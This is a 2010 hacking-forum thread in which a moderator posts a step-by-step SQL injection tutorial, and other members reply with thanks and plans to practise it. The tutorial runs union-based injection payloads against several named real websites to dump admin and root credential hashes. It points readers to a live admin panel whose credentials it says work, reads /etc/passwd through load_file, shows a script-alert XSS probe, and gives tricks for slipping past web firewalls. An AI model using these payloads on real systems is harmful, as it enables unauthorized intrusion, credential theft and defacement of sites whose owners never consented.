Statua
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Welcome To Statua. Feel free to message any of our staff.
 
HomeLatest imagesSearchRegisterLog in

 

 Error & Classic SQL Injection Tutorial

Go down 
4 posters
AuthorMessage
-Chosen-
Moderator
Moderator
-Chosen-


Posts : 16
Points : 27
Rep : 3
Join date : 2010-07-02
Location : 127.0.0.1

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeSat Jul 03, 2010 1:10 pm

Classic SQL Injection


Error & Classic SQL Injection Tutorial  2102121338_e36a5299aa

Without further ado, let the class begin.
This tutorial will be noob friendly and easy to follow. All you need to do is being able to comprehend and follow the steps accordingly.

Finding a Vulnerable Site.

Some people make finding a vulnerable site to SQLi more difficult than it really is. To be honest, this is the easy part.

We find sites that are Vulnerable to SQLi with what people call Dorks. If you dont know how to make your own, or dont have one, get them from here. Now that you have one, go to google and place it on the search bar. For this example I'll be using this dork:
details.php?id=

Eventually i stumbled upon this site:
Code:
http://www.ziadabdelfattah.ps/Political_editor/details.php?id=6

Finding the number of Columns.

Now that we got out target, lets find out the number of column the site has Smile

To do this we will use ORDER BY. Remember, this tutorial is written for Classic SQL Injection.

Now lets put in a false statement so we can gives our self a range to see how many columns this site could have.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=6 ORDER BY 20--

The above query will gives us an error that says that there are not 20 columns. So lets keep moving down until the page loads normally..

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=6 ORDER BY 10--

We still get an error that tells us that there are not 10 columns. Lets keep moving on lower..

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=6 ORDER BY 5--

Still get an error saying that there isnt 5 columns. Lets to lower but not too low.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=6 ORDER BY 4--

Notice that the page loaded normally, that means that the sites has 4 columns!

Finding the Vulnerable Columns.

Now lets find the vulnerable or visible columns. This is important because we will be replacing that column with our queries. This is what we have to do. We have to use this query UNION SELECT, so now lets put it together Smile

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,2,3,4--

Notice the "-" in front of the equal sign. When using UNION SELECT you want to make sure you have that there because it might not show the vulnerable columns.

Now the page outputted three vulnerable columns; 2,3,4. Now these columns will be replaced with our queries. I'll be using column 2.

Now at this point you can find the Version the current Database and current User and they are depicted by these queries.

version() or @@version <--They yield the same result.
user()
database()

Now lets find whats important the Version of the MySQL database.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,version(),3,4--

This is what the page outputs:
Code:
community-5.0.89

This is important because this will let us know that we can get all the information from this site using our queries and not by guessing the table and column names, that's what will happen with any Version 4 MySQL databases.

Sometimes the the above query wont return a the version so we need to resort to another solution. When this occurs, and the page refuse to give us the version, we need to use the convert([query] using latin1) or unhex(hex()) query. This is how it would look like:


http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,conver(version() using latin1),3,4--

or

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,conver(@@version using latin1),3,4--


http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,unhex(hex(version())),3,4--

or

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,unhex(hex(@@version)),3,4--

They will produce the same results as our previous query but sometimes you need to alternate to these queries when page fails to output information, or the version in this case.

Finding the Table Names.

Ok, the next step will be finding the tables of database. To do this we need a new separate query.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--


Notice that the vulnerable Column got replaced with group_concat(table_name), which is what we are trying to find(the tables).A nd we also introduced the query at the end; from information_schema.tables where table_schema=database()--

When we hit enter this is the output in the page:
Code:
books_days,cpanel,lotus,newspaper_battle,novels,political_editor,streets_world

This is the query you want to use to find the Table Names.

Finding the Column Names.

To find the Column names, all you will do is interchange the word table with column and the word tables with columns. But you would NOT change the ending part what include the Where clause. This is how it would look.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database()--

If you submit the query, this is what they page will output:
Code:
id,Title,Details,Date,img,id,usr,password,id,Title,Details,Date,id,Title,Details,Date,id,Title,Details,Date,id,Title,Details,Date,id,Title,Details,Date

Finding the Database Names.

Finding the names of the different Databases is similar to finding the Table and Column names, but instread your going to some words like so:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

You want to always use this query to find the database names, this is what the page outputs:
Code:
information_schema,ziad_ziad

As you can see it has two Databases but based on our previous query:
UNION SELECT 1,database(),3,4--, we know that Database ziad_ziad is in current use.

Now we we have to find a table we want to extract the information from. Now im going to pick the table cpanel because its possible that is has a username and password for its coolumns. Lets find out!

Using LIMIT.

I wanted to make sure to cover this because it is necessary to learn what LIMIT is and what it does. LIMIT is used to pull out a specific record from the database and bring it up. When you use limit, the current Database and the INFORMATION_SCHEMA
Database is intertwined as one. This means that when you go through the records, you will be navigating both Databases. Ill show you what i mean, for example, this is how limit will be used to find a specific Table.

If we group them with concat you get the Tables from both Databases:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables limit 0,1--

This is the output:
Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,books_days,cpanel,lotus,newspaper_battle,novels,political_editor,streets_world

As you can see, the INFORMAION_SCHEMA Database Tables showed up first, then our current Database Tables showed up second.

If we do not group them with concat you will get the Tables individually. For example:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables limit 0,1--

The output will be this:
Code:
CHARACTER_SETS

Now lets change our LIMIT from 0,1-- to 4,1-- to see what happen:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables limit 4,1--

This is the output:
Code:
COLUMN_PRIVILEGES

Now lets use the LIMIT to get a Table from our current Database:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables limit 17,1--

The output will be:
Code:
books_days

Lets do one more, to show you two examples of each Database using the LIMIT command:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables limit 18,1--

The output will be:
Code:
cpanel

This is how LIMIT will be used, Concat only returns back a certain amount of characters and when it can't extend to far, we can use LIMIT to pull out the records individually.

Finding the corresponding Columns for a Table.

To find the corresponding Columns for a Table, you have two alternatives. You can either turn the table name in HEX or in ASCII. I'll be showing you both.

Before anything we need a Text to HEX converter, if you don't have one get one here. Now lets look at HEX alternative to find the corresponding Columns for the Table cpanel.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x6370616e656c--

This is the page output:
Code:
id,usr,password

Lets take a closer look at our query. The vulnerable column got replaced with what we are trying to find, the column_name, where the table_name will be cpanel in HEX. The hex for cpanel is 6370616e656c but we need to put 0x behind it so the Database knows its HEX.

Ok now lets look at the ASCII alternative to find the corresponding Columns for the Table cpanel. This time you will need a Text to ASCII converter, if you don't have one, grab it here. This will produce the same result as the HEX alternative but I want to let you know that you have a choice in method.

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns where table_name=char(
99, 112, 97, 110, 101, 108)--


The page outputs the same results:
Code:
id,usr,password

If you noticed, all we really do is change the table_name=0x6370616e656c-- to table_name=char(
99, 112, 97, 110, 101, 108)--
, the rest of our query stayed the same.

Extracting the Information from the Database.

Now that we got the Table cpanel and the right columns, lets extract this information from the database! As you can see, the two columns that we want from this table is usr and password. This is how you will do it:

http://www.ziadabdelfattah.ps/Political_editor/details.php?id=-6 UNION SELECT 1,group_concat(usr,0x3a,password),3,4 from cpanel--

Very simple. I won't be posting the admin username and password on this thread because its against HackForum rules and The Alliance rules.

What is left to do is to find the login page. If you don't have any success doing it manually, I'll suggest you use an online admin page finder. This is the commonly used one here. After looking myself, i found out that the login directory is located at /myadmin/
Code:

http://www.ziadabdelfattah.ps/myadmin/

The admin credentials do work so please don't go inside and creating havoc. Be respectful.

Hopefully this tutorial was helpful to those who are a little unsure on how to exploit websites vulnerable to SQL Injection. Im looking forward to question, concerns, or anything you are unsure about.

Please give feedback and comment Smile

...:::|Final Note|:::...
I am not held responsible for the damage you cause with this information. This tutorial is used strictly for educational purposes.


Written by,
-Chosen-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-==-=-=-=-===-==-=
[align=center]
Error SQL Injection


Error & Classic SQL Injection Tutorial  2102121338_e36a5299aa

Pre-requisites:
For this course you must know how to inject sites with Classic SQL Injection. I will not be reviewing what I covered on the last class. Most of the concepts of Classic Injection will carry over to this course.

Course Overview:
OK so we've been on this hassle for a while about Error SQL Injection. Well whats the difference between Classic Injection and Error Injection? To be honest, they are almost the same thing. I would say that 90% of Classic SQL Injection can be correlated with Error Based SQL Injection.

If Classic Injection and Error Injection are the same, whats the difference?
Although there are very much alike, the difference between Classic SQLi and Error SQLi is how you go about finding the columns that are vulnerable to injection. Apart from that, the errors given from each type of injection will give you a clue if you want to be using your Classic or Error based SQLi.

Classic SQL Injections yield this type of error:

  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1


You get the idea. What you always look for in a Normal SQLi is that it told "You have an error in your SQL syntax."

Error SQL Injection yield this type of error:

  • Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/yogamagazine.co.uk/httpdocs/article.php...

  • Warning: extract(): First argument should be an array in /usr/local/psa/home/vhosts/yogamagazine.co.uk/httpdocs/article.php on line 28

  • Warning: main(./incl.php) [function.main]: failed to open stream: No such file or directory in /home/ccnc02/public_html/content/pr.php on line 7


The point is, that it gives you a Warning upon error, hence the name of the injection.

So just to get a feel for what this really means, lets experiment this type of injection with a site.

The Vulnerable URL:

http://www.dyadem.com/media/pr.php?id=3909

Finding The Columns:

Now, this is the part where Error Injection and Classic Injection differ. To find the columns in a site that is vulnerable to Error injection, you CAN'T use the Order By command to get the number of columns. Instead, you actually have to start from Column 2 and and keep moving up until you get a visible column with your Union All Select command. This is how it would look in particular.

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2-- <-- No visible columns.

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3-- <-- No visible columns.

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4-- <-- No visible columns.

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4,5-- <-- The page outputs a visible column!

From here, its the same ball game as Classic Injection.

Finding the Version:

Now that we got the vulnerable columns, lets get the Version:

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4,version()--

This is the output:
Code:
5.1.32-community 

Finding the Tables:

Now that we got the version and we dont have to guess because its version 5, lets proceed to get the tables of the database:

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

This is the result:
Code:
adwords_landing,articles,case_studies,clients,country,event_registrants,events,houston_registrants,industry,log,partners,partners2,press_releases,provinces,resource_center,resource_error,resource_link,resource_recommend,resource_search,resource_timer,resource_type,search_log,states,store_cart,store_creditcard,store_credittype,test,testimonials,training,training_category,training_courses,training_dates,user_base,user_billing,user_languages,user_levels,user_log,user_preferences,user_sessions,users

Finding the Columns:

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_schema=database()--

The output from our query is:
Code:
id,type,html,id,date,title,publication,link,id,client_id,title,document,protected,id,name,logo,industry,type,pr,cs,ts,country_id,country_iso,country_name,country_iso3,country_numcode,registrant_id,registrant_fname,registrant_lname,registrant_email,registrant_company,event_id,registrant_entry,id,title,description,type,date_start,date_end,time_start,time_end,time_zone,location,logo,flags,flag_url,flag_url2,flag_url3,active,res_id,id,firstName,lastName,company,email,industry_id,industry_name,log_id,log_timestamp,log_ip,log_browser,log_os,log_domain,log_path,log_referer,log_method,log_note,user_id,id,name,lang,english_desc,alt_lang_desc,logo,id,name,lang,eng_dec,alt_lang_desc,logo,id,client_id,date,title,text,province_id,province_name,province_code,res_id,res_name,res_title,res_description,res_filename,res_format,res_lang,type_id,res_protect,res_timed,res_keywords,res_views,res_downloads,res_price,res_manticore,res_promo,res_order,res_hidden,error_id,error_message,res_id,link_code,link_lang,link_promo,recommend_i

The Preferable Injection:

I dont want to waste too much time goring over some things that you should have known, im going to skip to the final injection because you should be familiar in how to get the corresponding columns for a table.

http://www.dyadem.com/media/pr.php?id=-3909 union all select 1,2,3,4,concat(user_name,0x3a,user_pass) from users limit 0,1--

Im not going to post the dump here because its against forum rules and The Alliance. Type in the query in the URL if you want to see the username and password.

The md5 hash is crackable and there is also a login panel. You should know how to crack simple md5 hashes and find login panels based on the previous Class. However, if you still need help, I'm here to assist you Smile

Now that your familiar on how to do Error Injection, Lets inject another site but with a twist put to it.

Vulnerable URL:

http://www.mcpost.com/article.php?id=957

I'm not going to go into detail on how to find the version, tables and columns but ill post everything that is useful about this site up. You should be able to pick up to what I'm doing.

Version:
Code:
5.1.34-community

Tables:
Code:
ads,articles,calendar,categories,config,issues,keywords,people,users,writers

Columns:
Code:
id,url,image,id,issue,headline,deck,shortheadline,category,writer,bodytext,caption,ordering,id,category,title,bodytext,startdate,enddate,ongoing,visible,id,name,type,id,name,value,id,volume,issue,startdate,enddate,visible,id,keyword,article,id,title,bodytext,startdate,enddate,visible,id,username,password,permission,deletable,id,name,visible

Preferable Injection:

http://www.mcpost.com/article.php?id=-1957 union all select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from users--


Great! we got the username and password and almost all the md5 hashes are crackable! What else would we want.

Now, lets go a little deeper with this particular injected site. I want you to get in a habit to always try to search for XSS because if we log in and we can shell the site, you can still deface it externally.

So go to the URL that is vulnerable to XSS which it the result of the search engine they have:

Code:
http://www.mcpost.com/search.php?query=

Put this in front of the equal sign and what happens?

Code:
<script>alert("xss")</script>

You get your XSS vulnerability. Most of you are asking why is this so unique? Well for this particular site, if you were to post a comment anywhere, you would have the opportunity to either deface the site from where your post was made, or escalate to a CSRF attack. Trust me on this one, i already know this site can be defaced with XSS.

Ok well the site is vulnerable to Error SQLi a Non-persistent XSS but it could turn to Persistent XSS and even CSRF. What more can you possible get besides a possible deface, most of the username and passwords?

Well there is another thing you can do to this site. Just like i wanted you to get in the habit to look for XSS vulnerabilities on a site when attempting SQLi, is to look for the default mysql.user table, this is how it goes. Lets see if this site even has it.

http://www.mcpost.com/article.php?id=-1957 union all select 1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12 from mysql.user--

We got root!! The best part about this is that the root was successfully cracked! Now we have everything from this site!.

I dont if many of you know about LFI? Well you can get the output from an LFI vulnerability into SQLi! that's another really good thing about this. Just to demonstrate how an LFI output looks looks, ill post an example here:

http://pastebin.com/bkfLpe1Q

Whats so special about this? Well you can get the same output in SQLi with this query, (this will just be an example because i couldn't find the site i did this with because i lost it -.-")

http://www.mcpost.com/article.php?id=-1957 union all select 1,2,load_file(etc/passwd),4,5,6,7,8,9,10,11,12--

The thing is that we have to HEX the etc/passwd to get the correct output:

http://www.mcpost.com/article.php?id=-1957 union all select 1,2,load_file(0x6574632f706173737764),4,5,6,7,8,9,10,11,12--

And just like that you have the same output as an LFI vulnerability all incorporated in SQLi.

One Last Thing I Want To Cover: Bypassing WAF (Web Application Firewalls):

Often times when your attempting SQL Injections, you might come across some nasty errors and you don't know why they happen. "I thought I had the right amount of columns!", "WTF why is the page not displaying any info?." Questions like this come to the injector which causes them to give up. Wrong choice!

Just like there is different methods to bypass an admin login, 1=1--, ' or 'a'='a. There is also different methods to bypass WAF's.

Ill be showing you different ways to bypass WAF's, what works and what doesnt work. Im not going to be using a site as an example because this is the type of work that separates l33t injectors, from newbeews.

For example the following query sent will not allow an attacker to get back information:

/article.php?id=1957 union all select 1,2,3,4--

If there is some kind of vulnerability in the WAF, this query will be successfully sent:

/article.php?id=1957/**/union/**/all/**/select/**/1,2,3,4--

You can also put comments inside the /**/ like so, and will also bypass WAF:

/article.php?id=1957/*union*/union/*all*/all/*select*/select/**/1,2,3,4--

Just like before, lets say this request wont allow us to make an attack:
/article.php?id=1957 union all select 1,2,3,4--

But if you try this, you could enitiate the attack:
/article.php?id=1957 un/**/ion a/**/ll sel/**/ect 1,2,3,4--

Do you see how this works? Your cutting things up in bits almost to find the right combination that will let you execute your query. Just like XSS or bypassing login with SQLi, one command doesn't work for all the sites. You can also try different things like instead of using the "--" and the end, you can use "/*" instead. This is something you might want to keep in mind when your injecting a website.

Well gang, its about time i wrapped this up. I covered a multitude of things that you want to keep in mind when your attempting an Injection. Now you know both Classic and Error SQL Injections Smile

Once again, im not held responsible for absolutely anything you do with this information. Act under your own convenience and be responsible for your own actions. This Course was written for educational purposes. Do not spread this Lesson, it's private for a reason.

Written by,
-Chosen-
Back to top Go down
mistermostwanted




Posts : 7
Points : 10
Rep : 3
Join date : 2010-07-03

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Thnx brother   Error & Classic SQL Injection Tutorial  Icon_minitimeSat Jul 03, 2010 3:23 pm

Hey bro Very Happy. This tutorial was awesome. simply the best. I read a lot of tutorials on Web Injections but this one was the best among all. the Best part of it was the Bypassing WAF (Web Application Firewalls). I knew that a bit though but not that much. This tutorial explained that well. i will try it soon. Wink
Thnx bro. cheers
Keep going
Back to top Go down
R0ll3r




Posts : 7
Points : 11
Rep : 0
Join date : 2010-06-17

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeSat Jul 03, 2010 7:36 pm

*cough* Copy and Pasted *cough*

Code:
Very simple. I won't be posting the admin username and password on this thread because its against HackForum rules and The Alliance rules.
Back to top Go down
-Chosen-
Moderator
Moderator
-Chosen-


Posts : 16
Points : 27
Rep : 3
Join date : 2010-07-02
Location : 127.0.0.1

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeSat Jul 03, 2010 8:45 pm

@R0ll3r

Lol actually i wrote the entire thing in HackForums. Before you post none sense or try to flame, do some research on me because you dont know what your talking about Wink

If you dont have anything good to say, dont say anything at all Cool

@mistermostwan3d

Thanks bro, i wrote this a long time ago but it was in a private section in HF, only members of The Alliance, like myself, could access the tut. Glad you enjoyed it Smile

-Chosen-
Back to top Go down
alex
Admin
Admin
alex


Posts : 28
Points : 10048
Rep : 2
Join date : 2010-06-18
Age : 29
Location : uk

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeSun Jul 04, 2010 5:26 am

R0ll3r wrote:
*cough* Copy and Pasted *cough*

Code:
Very simple. I won't be posting the admin username and password on this thread because its against HackForum rules and The Alliance rules.

It is true Smile he did write the entire thing himself!
Back to top Go down
http://statua.co.cc
mistermostwanted




Posts : 7
Points : 10
Rep : 3
Join date : 2010-07-03

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Hey brother   Error & Classic SQL Injection Tutorial  Icon_minitimeSun Jul 04, 2010 8:27 am

@ -Chosen-
Yes i actually wondered y didn't u post it on HF. Now i knew that u did post it but i was not able to read it becoz of that VIP Access.
But i found it here and yes i enjoyed it a lot. and i will actually enjoy it when i will be practicing it.
thnx and Keep going. cheers
Back to top Go down
alex
Admin
Admin
alex


Posts : 28
Points : 10048
Rep : 2
Join date : 2010-06-18
Age : 29
Location : uk

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeTue Jul 06, 2010 3:18 am

grrrrr......on one of the sites ( using classic) i got this error Query failed: Table 'information_schema.tables' doesn't exist
Guess they have outsmarted us changing the location of the table

Also next can we have a blind SQLi tut?
Back to top Go down
http://statua.co.cc
-Chosen-
Moderator
Moderator
-Chosen-


Posts : 16
Points : 27
Rep : 3
Join date : 2010-07-02
Location : 127.0.0.1

Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitimeTue Jul 06, 2010 10:49 am

Sorry for my inactivity lately but i was studying. Anyways lol

The reason you got that error is because its probably version 4, Check the version which is very important. You can only automate things if its version 5.

Im not sure about making that BSQLi tutorial the reason being because ive been busy lately. Pen Testing and contacting my high school for audit they server is taking up most of my time.

If you want i can post a BSQLi tutorial but i didnt write it, its one of the best on the net

-Chosen-
Back to top Go down
Sponsored content





Error & Classic SQL Injection Tutorial  Empty
PostSubject: Re: Error & Classic SQL Injection Tutorial    Error & Classic SQL Injection Tutorial  Icon_minitime

Back to top Go down
 
Error & Classic SQL Injection Tutorial
Back to top 
Page 1 of 1
 Similar topics
-
» Basic Batch Tutorial

Permissions in this forum:You cannot reply to topics in this forum
Statua :: Hacking :: Website and Forum Hacking-
Jump to: